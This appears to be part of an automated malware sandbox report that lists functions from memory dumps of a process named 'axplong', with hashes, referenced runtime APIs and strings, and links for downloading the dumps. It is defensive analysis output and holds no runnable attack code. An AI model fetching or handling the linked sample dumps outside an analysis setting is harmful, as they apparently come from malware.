Associated: 00000004.00000002.3319717085.00000000007E1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.000000000080D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.0000000000814000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.0000000000823000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321220392.0000000000824000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321348595.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321373951.00000000009CB000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_500000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1931ab3fa838505a363074229497c684d0736b58b632a633b31151d83af4d8ef
Instruction ID: 1debf53b2a5145ac6df65511b5294ed4fd21ffd733f2d5f153b5afbde6f4bbe6
Opcode Fuzzy Hash: 1931ab3fa838505a363074229497c684d0736b58b632a633b31151d83af4d8ef
Instruction Fuzzy Hash: 5B51B1706087918FD319CF2DD12523ABFE1BFD9201F084A9EE4D697292D774EA44CB91

Function 0054777B Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3319619171.0000000000501000.00000040.00000001.01000000.00000007.sdmp, Offset: 00500000, based on PE: true

Associated: 00000004.00000002.3319588700.0000000000500000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319619171.0000000000562000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319691281.0000000000569000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.000000000056B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.00000000007E1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.000000000080D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.0000000000814000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.0000000000823000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321220392.0000000000824000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321348595.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321373951.00000000009CB000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_500000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fdf5e08ab852b0b2a56e9270e0e5071e9b8fc51d86e260dd0e317cbe6e387a6c
Instruction ID: 5a03bd320a62174a177d969139a29526efa55cb3301b45b0d84edb079f679eff
Opcode Fuzzy Hash: fdf5e08ab852b0b2a56e9270e0e5071e9b8fc51d86e260dd0e317cbe6e387a6c
Instruction Fuzzy Hash: 5321B673F204394B770CC47E8C572BDB6E1C68C541745423AE8A6EA2C1D968D917E2E4

Function 0054765B Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3319619171.0000000000501000.00000040.00000001.01000000.00000007.sdmp, Offset: 00500000, based on PE: true

Associated: 00000004.00000002.3319588700.0000000000500000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319619171.0000000000562000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319691281.0000000000569000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.000000000056B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.00000000007E1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.000000000080D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.0000000000814000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.0000000000823000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321220392.0000000000824000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321348595.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321373951.00000000009CB000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_500000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df403b92c24518ac194eca51f14439bdd48e078c28547bd1bb6f9af713178d64
Instruction ID: 683bdc2b0fc6343a7f5471b29007232678ef935c8d9693d7d71d10a01ddf405f
Opcode Fuzzy Hash: df403b92c24518ac194eca51f14439bdd48e078c28547bd1bb6f9af713178d64
Instruction Fuzzy Hash: 6011A733F30C295A675C816D8C172BAA5D2EBD824070F433AD826E7284E994DE23D290

Function 00548720 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3319619171.0000000000501000.00000040.00000001.01000000.00000007.sdmp, Offset: 00500000, based on PE: true

Associated: 00000004.00000002.3319588700.0000000000500000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319619171.0000000000562000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319691281.0000000000569000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.000000000056B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.00000000007E1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.000000000080D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.0000000000814000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.0000000000823000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321220392.0000000000824000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321348595.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321373951.00000000009CB000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_500000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 4d0b7b3c55794800b8b90e70c99cf788df1d22ada076aa09a2e36870bd33c98c
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: AB11087B20014147D604862DC9F86FEAF96FAC532DB3C437AD1414B758DA23A945D900

Function 04F00130 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3327380376.0000000004F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4f00000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd1dd7e332e387152e7671bf2b9b1d9b54b5accc332360c5625cc5e7e226b56c
Instruction ID: 3352514a9591ab8a99bbd667d29041d4957a183cc718e3b4e5691535629f1963
Opcode Fuzzy Hash: cd1dd7e332e387152e7671bf2b9b1d9b54b5accc332360c5625cc5e7e226b56c
Instruction Fuzzy Hash: 30F0C297398121BD63064D547A427F62A5AE3C6334320C417F007C9996EE487A07B066

Function 0053645B Relevance: .0, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3319619171.0000000000501000.00000040.00000001.01000000.00000007.sdmp, Offset: 00500000, based on PE: true

Associated: 00000004.00000002.3319588700.0000000000500000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319619171.0000000000562000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319691281.0000000000569000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.000000000056B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.00000000007E1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.000000000080D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.0000000000814000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.0000000000823000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321220392.0000000000824000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321348595.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321373951.00000000009CB000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_500000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9cf45c8a8db2a398d62f740f81bc101b6d15e950d47e228358612b2ae426da80
Instruction ID: 21b78900e6b52a78bb30609ffe8697b6d222185c421d06cedf139094ad5ba9e0
Opcode Fuzzy Hash: 9cf45c8a8db2a398d62f740f81bc101b6d15e950d47e228358612b2ae426da80
Instruction Fuzzy Hash: 91E08C70441A08BADE267F54CD49A487F6AFB41344F409418F8044B221CBA6EC82CA80

Function 0053A1C2 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3319619171.0000000000501000.00000040.00000001.01000000.00000007.sdmp, Offset: 00500000, based on PE: true

Associated: 00000004.00000002.3319588700.0000000000500000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319619171.0000000000562000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319691281.0000000000569000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.000000000056B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.00000000007E1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.000000000080D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.0000000000814000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.0000000000823000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321220392.0000000000824000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321348595.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321373951.00000000009CB000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_500000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction ID: be8f739d45d20b4fe425fcb035b7e26766c37a4fbfc8034b7c3e5d71b7d947e8
Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction Fuzzy Hash: 2CE0B672915228EBCB25DB988948D8AF7ACFB89B50F554496B501D3251C370DF00C7D1

Function 00517870 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 123COMMON

Download Yara Rule

APIs

__Cnd_unregister_at_thread_exit.LIBCPMT ref: 0051795C
__Cnd_destroy_in_situ.LIBCPMT ref: 00517968
__Mtx_destroy_in_situ.LIBCPMT ref: 00517971

Strings

'kQd+V, xrefs: 00517879, 0051790B
d+V, xrefs: 00517904, 00517912, 0051790A
@yQ, xrefs: 0051794A

Memory Dump Source

Source File: 00000004.00000002.3319619171.0000000000501000.00000040.00000001.01000000.00000007.sdmp, Offset: 00500000, based on PE: true

Associated: 00000004.00000002.3319588700.0000000000500000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319619171.0000000000562000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319691281.0000000000569000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.000000000056B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.00000000007E1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.000000000080D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.0000000000814000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.0000000000823000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321220392.0000000000824000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321348595.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321373951.00000000009CB000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_500000_axplong.jbxd

Yara matches

Similarity

API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situ
String ID: 'kQd+V$@yQ$d+V
API String ID: 4078500453-3851488442
Opcode ID: 0bb1f7555eff302b05e2d3c55dae9a0f994b01d2aade898fafa1dbfa5affc93d
Instruction ID: 1f3d550f871a708a64ab2a89d7edecba2710751a437fd78248f886cd4e9bc594
Opcode Fuzzy Hash: 0bb1f7555eff302b05e2d3c55dae9a0f994b01d2aade898fafa1dbfa5affc93d
Instruction Fuzzy Hash: 9331B7B19047059BE720DF68D845A96BFF8FF58310F100A2EF545C7241E771EA98C7A1

Function 005370C9 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON

Download Yara Rule

APIs

_wcsrchr.LIBVCRUNTIME ref: 0053710B

Strings

.com, xrefs: 0053714B
.cmd, xrefs: 00537129
.exe, xrefs: 00537118
.bat, xrefs: 0053713A

Memory Dump Source

Source File: 00000004.00000002.3319619171.0000000000501000.00000040.00000001.01000000.00000007.sdmp, Offset: 00500000, based on PE: true

Associated: 00000004.00000002.3319588700.0000000000500000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319619171.0000000000562000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319691281.0000000000569000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.000000000056B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.00000000007E1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.000000000080D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.0000000000814000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.0000000000823000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321220392.0000000000824000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321348595.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321373951.00000000009CB000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_500000_axplong.jbxd

Yara matches

Similarity

API ID: _wcsrchr
String ID: .bat$.cmd$.com$.exe
API String ID: 1752292252-4019086052
Opcode ID: e26a55568bcc32874ae009e1381d3adb05519159ee7d35ebca0973716e2ec962
Instruction ID: c7f3edce726053190f9fa5e0b29be37a1f354dd2df9d9f10baa8e289a1bfdb30
Opcode Fuzzy Hash: e26a55568bcc32874ae009e1381d3adb05519159ee7d35ebca0973716e2ec962
Instruction Fuzzy Hash: 5001C877A0861B66662864199C1367B1F9CBBC6BB4F15002BFE44F73C1DE45DC0282A0

Function 00502E80 Relevance: 7.8, APIs: 5, Instructions: 272COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00502F1F
__Mtx_unlock.LIBCPMT ref: 00502F8C
__Cnd_broadcast.LIBCPMT ref: 00502FA3
__Mtx_unlock.LIBCPMT ref: 005030B5
__Mtx_unlock.LIBCPMT ref: 0050315B

Memory Dump Source

Source File: 00000004.00000002.3319619171.0000000000501000.00000040.00000001.01000000.00000007.sdmp, Offset: 00500000, based on PE: true

Associated: 00000004.00000002.3319588700.0000000000500000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319619171.0000000000562000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319691281.0000000000569000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.000000000056B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.00000000007E1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.000000000080D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.0000000000814000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.0000000000823000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321220392.0000000000824000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321348595.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321373951.00000000009CB000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_500000_axplong.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$Cnd_broadcast
String ID:
API String ID: 32384418-0
Opcode ID: 7c96d2e003068e2b4f863d549432ae72a3a24b8284bdd63083ee10ad246e1606
Instruction ID: 09ea6d6b78f652ba6c3589efbe0b54d3e7f35829fe9beaf909fcedcc1d4760c3
Opcode Fuzzy Hash: 7c96d2e003068e2b4f863d549432ae72a3a24b8284bdd63083ee10ad246e1606
Instruction Fuzzy Hash: 86A122B1A41306AFEB11DF64C949BAEBFB8FF54314F008529E815D7281EB31EA44CB91

Function 00502670 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 207COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00502806
___std_exception_destroy.LIBVCRUNTIME ref: 005028A0

Strings

P#P, xrefs: 005027BE, 00502899
P#P, xrefs: 00502811

Memory Dump Source

Source File: 00000004.00000002.3319619171.0000000000501000.00000040.00000001.01000000.00000007.sdmp, Offset: 00500000, based on PE: true

Associated: 00000004.00000002.3319588700.0000000000500000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319619171.0000000000562000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319691281.0000000000569000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.000000000056B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.00000000007E1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.000000000080D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.0000000000814000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.0000000000823000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321220392.0000000000824000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321348595.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321373951.00000000009CB000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_500000_axplong.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy___std_exception_destroy
String ID: P#P$P#P
API String ID: 2970364248-2445065942
Opcode ID: 2cd1ff64c82f658fccfacf6768bde323b97aef5797e5ba470636efce3efaea73
Instruction ID: e9faeaacbe02793c4fd86e05bc263affc72e9042bb2c0b77c6e67c273954e9b1
Opcode Fuzzy Hash: 2cd1ff64c82f658fccfacf6768bde323b97aef5797e5ba470636efce3efaea73
Instruction Fuzzy Hash: 51717071E002099BDB15DFA8C885BDDFFB5FF59310F14822DE805A7282E774A984CBA5

Function 00502AD0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 51COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00502B23

Strings

P#P, xrefs: 00502B18
This function cannot be called on a default constructed task, xrefs: 00502B03
P#P, xrefs: 00502B2E

Memory Dump Source

Source File: 00000004.00000002.3319619171.0000000000501000.00000040.00000001.01000000.00000007.sdmp, Offset: 00500000, based on PE: true

Associated: 00000004.00000002.3319588700.0000000000500000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319619171.0000000000562000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319691281.0000000000569000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.000000000056B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.00000000007E1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.000000000080D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.0000000000814000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.0000000000823000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321220392.0000000000824000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321348595.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321373951.00000000009CB000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_500000_axplong.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: P#P$P#P$This function cannot be called on a default constructed task
API String ID: 2659868963-81232500
Opcode ID: e8693b9627cbc4338914e4f982410b22c23a0aceb9681464b52c422bddb07ea9
Instruction ID: cbebaf9192ae34e490f89e089b6c543f343df0d6b8c7ccce655d8859eb064646
Opcode Fuzzy Hash: e8693b9627cbc4338914e4f982410b22c23a0aceb9681464b52c422bddb07ea9
Instruction Fuzzy Hash: 1FF0C270A1020CABCB10DFA8984599EBFE9EF54300F1041AEFC0597201EBB1AA88CB94

Function 00502440 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 32COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 0050247E

Strings

P#P, xrefs: 0050246D
'kQd+V, xrefs: 00502440
P#P, xrefs: 00502486

Memory Dump Source

Source File: 00000004.00000002.3319619171.0000000000501000.00000040.00000001.01000000.00000007.sdmp, Offset: 00500000, based on PE: true

Associated: 00000004.00000002.3319588700.0000000000500000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319619171.0000000000562000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319691281.0000000000569000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.000000000056B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.00000000007E1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.000000000080D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.0000000000814000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.0000000000823000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321220392.0000000000824000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321348595.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321373951.00000000009CB000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_500000_axplong.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: 'kQd+V$P#P$P#P
API String ID: 2659868963-283308068
Opcode ID: da61c383ecfd8c7e14061b96e95c9c7dceab34e0b26cf9d4c79d81c0fae4df79
Instruction ID: 52b9477226ac8074429e68d047fa588122cfa7f3ae99efc0a2e13d80d693607f
Opcode Fuzzy Hash: da61c383ecfd8c7e14061b96e95c9c7dceab34e0b26cf9d4c79d81c0fae4df79
Instruction Fuzzy Hash: 16F0E5B191030D67CB14EBE4D80988ABBECEE55310F008A26FA44E7940F770FA488B91

Function 0053C9B0 Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0053CA37

Memory Dump Source

Source File: 00000004.00000002.3319619171.0000000000501000.00000040.00000001.01000000.00000007.sdmp, Offset: 00500000, based on PE: true

Associated: 00000004.00000002.3319588700.0000000000500000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319619171.0000000000562000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319691281.0000000000569000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.000000000056B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.00000000007E1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.000000000080D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.0000000000814000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.0000000000823000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321220392.0000000000824000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321348595.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321373951.00000000009CB000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_500000_axplong.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
Instruction ID: eea36df060cc8a6fdcae9e5c499012ba6b8ba5af9e835f1487b98e757915755d
Opcode Fuzzy Hash: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
Instruction Fuzzy Hash: 4CB1053290028A9FDB15CF68C8917BEBFE5FF95340F1485AAE855BB342D6349D41CB60

Function 0051BAA2 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 0051BAFA
__Xtime_diff_to_millis2.LIBCPMT ref: 0051BB14
_xtime_get.LIBCPMT ref: 0051BB37
__Xtime_diff_to_millis2.LIBCPMT ref: 0051BB43

Memory Dump Source

Source File: 00000004.00000002.3319619171.0000000000501000.00000040.00000001.01000000.00000007.sdmp, Offset: 00500000, based on PE: true

Associated: 00000004.00000002.3319588700.0000000000500000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319619171.0000000000562000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319691281.0000000000569000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.000000000056B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.00000000007E1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.000000000080D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.0000000000814000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.0000000000823000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321220392.0000000000824000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321348595.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321373951.00000000009CB000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

